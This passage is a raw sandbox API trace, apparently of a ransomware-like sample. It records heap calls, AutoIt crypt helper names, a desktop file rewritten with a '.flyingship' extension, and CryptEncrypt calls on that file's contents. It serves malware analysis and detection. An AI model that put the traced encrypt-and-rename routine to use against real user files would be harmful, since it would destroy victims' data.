RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ab50 [0075.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3c8 [0075.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0075.918] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0075.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0075.918] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3c8 | out: hHeap=0x650000) returned 1 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3c8 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad60 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb408 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5d0 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76abf8 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb538 [0075.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5d0 | out: hHeap=0x650000) returned 1 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3e8 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x90) returned 0x698698 [0075.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b0d8 | out: hHeap=0x650000) returned 1 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3480 [0075.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0075.919] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x50) returned 0x6d3530 [0075.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x698698 | out: hHeap=0x650000) returned 1 [0075.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3e8 | out: hHeap=0x650000) returned 1 [0075.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abf8 | out: hHeap=0x650000) returned 1 [0075.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb538 | out: hHeap=0x650000) returned 1 [0075.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b5d0 | out: hHeap=0x650000) returned 1 [0075.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0075.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6d3480 | out: hHeap=0x650000) returned 1 [0075.919] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0075.921] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5c0eXZdnCGl.flyingship.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5c0exzdncgl.flyingship.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0075.921] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de50 [0075.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e168 [0075.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0075.922] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0075.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0075.922] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.922] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8af8 [0075.922] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb388 [0075.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0075.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ae68 [0075.922] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.922] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x61ea48 | out: lpNewFilePointer=0x0) returned 1 [0075.922] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0xb2c5, lpOverlapped=0x0) returned 1 [0075.924] ReadFile (in: hFile=0x128, lpBuffer=0x771fe8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x61ea70, lpOverlapped=0x0 | out: lpBuffer=0x771fe8*, lpNumberOfBytesRead=0x61ea70*=0x0, lpOverlapped=0x0) returned 1 [0075.926] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.926] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.926] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dab8 [0075.926] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ace8 [0075.926] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0075.926] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.926] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xb2c5) returned 0x795ff8 [0075.926] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.926] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.926] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0075.926] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0075.926] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.926] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0075.926] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3f8 [0075.926] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0075.926] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0075.927] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0075.927] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b198 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0075.927] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0075.927] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aa30 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b090 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.927] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f100 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e000 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e480 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb428 [0075.927] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb438 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5d8 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0075.928] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96e8 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e540 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0075.928] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e5a0 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0075.928] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.928] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4f8 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0075.928] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0075.928] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.929] CryptGetKeyParam (in: hKey=0x6b8b78, dwParam=0x7, pbData=0x6bb5d8, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb5d8*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792010 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96e8 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b138 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb628 [0075.929] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0075.929] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb498 [0075.929] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9728 [0075.929] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.929] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.929] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.929] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.929] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.929] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.929] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0075.929] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.929] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.929] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.930] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.930] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.930] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0075.930] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.930] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.930] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.930] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.930] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.930] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.930] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.930] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.930] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.930] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.930] CryptEncrypt (in: hKey=0x6b8b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0xb2c5, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0xb2d0) returned 1 [0075.930] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.931] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.931] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.931] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.931] CharLowerBuffW (in: lpsz="byte[45777]", cchLength=0xb | out: lpsz="byte[45777]") returned 0xb [0075.932] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.933] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.933] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.933] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0075.933] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0075.933] CryptEncrypt (in: hKey=0x6b8b78, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7b7868*, pdwDataLen=0x61e2d8*=0xb2c5, dwBufLen=0xb2d0 | out: pbData=0x7b7868*, pdwDataLen=0x61e2d8*=0xb2d0) returned 1 [0075.934] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.935] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.935] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.936] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.936] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.936] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.936] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0075.936] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.936] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0075.936] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.936] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0075.936] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.936] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0075.936] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0075.936] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.936] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0075.936] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0075.939] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.941] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.941] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.943] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.943] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0075.943] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0075.943] PeekMessageW (in: lpMsg=0x61eb04, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61eb04) returned 0 [0075.943] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0075.943] PeekMessageW (in: lpMsg=0x61e4b4, hWnd=0x0, wMsgFilterMin=0x0, 